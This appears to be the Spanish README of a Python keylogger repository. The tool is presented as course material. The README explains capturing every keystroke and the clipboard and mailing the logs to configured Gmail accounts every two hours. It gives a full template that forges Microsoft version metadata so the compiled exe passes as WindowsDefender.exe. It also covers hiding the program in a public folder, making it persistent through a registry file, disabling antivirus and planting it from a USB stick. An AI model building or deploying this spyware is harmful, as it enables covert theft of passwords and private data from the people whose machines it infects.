Actual: v2.1
Documentación actualizada: 02-05-2020
Nota importante: Esta herramienta tiene como proposito general y de uso exclusivo para aprendizaje, se creó como parte de un curso Online de hacking de "Seguridad de sistemas informáticos", no me hago responsable de un posible mal uso de ésta herramienta.
Las razones del uso de un Keylogger son para fines de seguridad de una empresa, ya sea que estén viendo qué está haciendo el personal, cómo interactúan sus personas en las computadoras o que los atacantes intenten obtener información confidencial, como información de inicio de sesión u otros datos confidenciales. Este programa simplemente toma cada pulsación de tecla ingresada en el teclado y luego envía el archivo de registro por correo electrónico cada 2 horas.
icon.ico= Icono Windows DefenderKeyloggerWindows.py= Código fuente del KeyloggerLICENCE= LicenciaREADME.md= DocumentaciónStartUp.reg= Modifica el Registro de Windowsversion.txt= Información detalla de conversión.pya.exeWindowsDefender.exe= Keylogger Compilado
- Envío por Gmail: Envía el registro de teclas por Gmail.
- Recibe datos por varios correos: Hay una posibilidad de agregar 1 o más correos, y así el registro de notas se envíe a varios correos a la vez,
- Verifica conexión a internet: El keylogger verifica si la computadora está conectada a internet, y si ese es el caso envía los datos, en caso contrario, no lo envía,
- Tiempo de envío personalizado: Usted puede elegir un intervalo de tiempo personalizado, en la cual desea que se envíe los archivos,
No se recomienta que sean muy seguidos, ya que el servidor de mensajería de google, bloqueará la cuenta por 1 día, por eso el tiempo de intervalo de envío escogida es de 2 Horas, éstas horas se cuentan despues de iniciar el script - Obtención de datos a prueba de errores: En otros keylogger al momento de enviar el
log.txt, éste proceso demora entre 3 a 5 segundos, y en ese transcurso de tiempo el keylogger no obtiene el registro de teclas, en éste keylogger, ese error está solucionado, obteniendo siempre los datos - Segundo plano: Este keylogger, al ejecutarse en la linea de comando, sí mostrará una consola, solo por debuggeo, pero al ser convertida a
*.exese utilizara un comando para que ésta se ejecute en segundo plano. - Disfraz: Al momento de ser convertido de
*.py a *.exe. El Keylogger será disfrazado comoWindowsDefender.execon el ícono y la información del programa. - Oculto: El Keylogger al iniciar se copia (Solo si ya está en un archivo *exe) a la carpeta
"C:\Users\Public\Security\Windows Defender", y en esa carpeta encuentras el archivolog.txt. - Iniciar automaticamente con el sistema: Se encuentra un archivo llamado
StartUp.reg, la cual al ejecutarlo, ésta escribe el registro y permite que el keylogger se ejecute al iniciar sesión. - Segundo Gmail en caso de Error: En casó el correo principal sea bloqueada o tenga x problemas, se usará un segundo correo.
- Conexión a una base de datos MySQL: Los datos recopilados serán enviados por una conexión a una base de datos en vez de por mensajes.
- Soporte de envió a otros buzones de correo: Se insertará un soporte para poder usar Outlook, yahoo u otros servicios de correo
- Conexión FTP: Envía el archivo
log.txtvía FTP. - Envía datos mediante FTP: enviará documentos, fotos y videos mediante una conexión FTP, en segundo plano.
- Portapapeles: Obtiene el texto del portapapeles.
El programa se repite 2 veces ya que ésta utiza 2 hilos de ejecución
Requerimiento de paquetes de Python3:
import pynputimport getuserimport datetimeimport osimport timeimport yagmailimport socketimport threading
-
Es de suma urgencia habilitar el acceso a apps menos seguras de google, la cual lo puedes hacer desde éste link.
En caso no lo habilites, el keylogger no podrá iniciar sesión en su Gmail -
Use
git clone https://github.com/SebastianEPH/Keylogger-py.gitpara descargar el repositorio en su computadora. -
Abra el archivo
KeyloggerWindows.pyen su editor de texto. -
Busque la función
SendLog()y ahí encontrará las siguientes lineas de código, las cuales debe modificar, el correo primario remitente, el correo segundario remitente y el o los correos receptores.
# Correo de envío [Principal] <=> Se enviará
sender_email_P = "[email protected]" # <<== Cambia éste correo
sender_password_P = "contraseña" # <<== Contraseña del correo
# Correo de envío [Segundaria] <=> Solo si hay algún problema de envío con el correo Principal
sender_email_S = "[email protected]" # <<== Cambia éste correo
sender_password_S = "contraseña" # <<== Contraseña del correo
# Correo o correos que recibirán el registro de datos `log.txt`
receiver_email = ["[email protected]", "[email protected]", "[email protected]"] # MultiCorreo
# receiver_email = ["[email protected]"] # SingleCorreoSe utilizará pyinstaller
-
En la carpeta principal encontrará dos archivos, uno llamado
icon.icoy el otroversion.txt, éstos 2 archivos son importantes para la conversión del*.py a *.exe.icon.ico= El icono que tendrá el keylogger al ser convertidoversion.txt= Información detallada del keyloger.
Ambos archivos son importantes para ocultar el
keyloggero tratar de hacerlo pasar cómo un programa que no es, así como la siguiente imagen:Toda esa información puede ser modificada en el archivo de la plantilla
version.txt -
Disfraz [Información]: El el siguiente archivo
version.txt, puedes modificar la información del*.exela cual se supone que de ser creible.
VSVersionInfo(
ffi=FixedFileInfo(
filevers=(6, 1, 7601, 17514),
prodvers=(6, 1, 7601, 17514),
mask=0x3f,
flags=0x0,
OS=0x40004,
fileType=0x1,
subtype=0x0,
date=(0, 0)
),
kids=[
StringFileInfo(
[
StringTable(
u'040904B0',
[StringStruct(u'CompanyName', u'Microsoft Corporation'),
StringStruct(u'FileDescription', u'Windows Security Health Host Key'),
StringStruct(u'FileVersion', u'6.1.7601.17514 (win7sp1_rtm.101119-1850)'),
StringStruct(u'InternalName', u'Windows Defender'),
StringStruct(u'LegalCopyright', u'\xa9 Microsoft Corporation. All rights reserved.'),
StringStruct(u'OriginalFilename', u'SecurityHealthHostKey.exe'),
StringStruct(u'ProductName', u'Microsoft\xae Windows\xae Operating System'),
StringStruct(u'ProductVersion', u'6.1.7601.17514')])
]),
VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
]
)-
Conversión final: Mediante Consola debe dirigirse a la carpeta principal. Los requisitos es tener instalada la librería
pyinstaller, porfavor mire un tutorial antes de hacer éste proceso, la linea de comando recomendada es la siguiente:pyinstaller --clean --distpath "Keylogger Terminado" -F --windowed --icon icon.ico --version-file version.txt KeyloggerWindows.py
- Usten tendrá al finalizar 2 archivos:
- El archivo llamado
WindowsDefender.exees el keylogger. - El archivo llamado , modifica el registro de windows, y hace que el keylogger se ejecute siempre al iniciar el usuario.
- Usten guardará esos archivos en un USB
- Es necesario desactivar el antivirus o agregar una exclusión en al siguiente ruta:
"C:\Users\Public\Security\Windows Defender" - Lo siguiente es ejecutar el archivo
WindowsDefender.exeen el USB, el keylogger se replicará en la siguiente ruta"C:\Users\Public\Security\Windows Defender", Se recomienda no sacar el USB al instante ya que el keylogger se estará replicando enla ruta. - Lo siguiente es darle 2 click al archiv
StartUp.reg, y ésto hará que el registro de windows sea modificado y el keylogger se ejecute - Nota: No hay un orden fijo, usted puede ejecutar primero el archivo
WindowsDefender.execómo el archivoStartUp.regy ésto no causará ningún problema.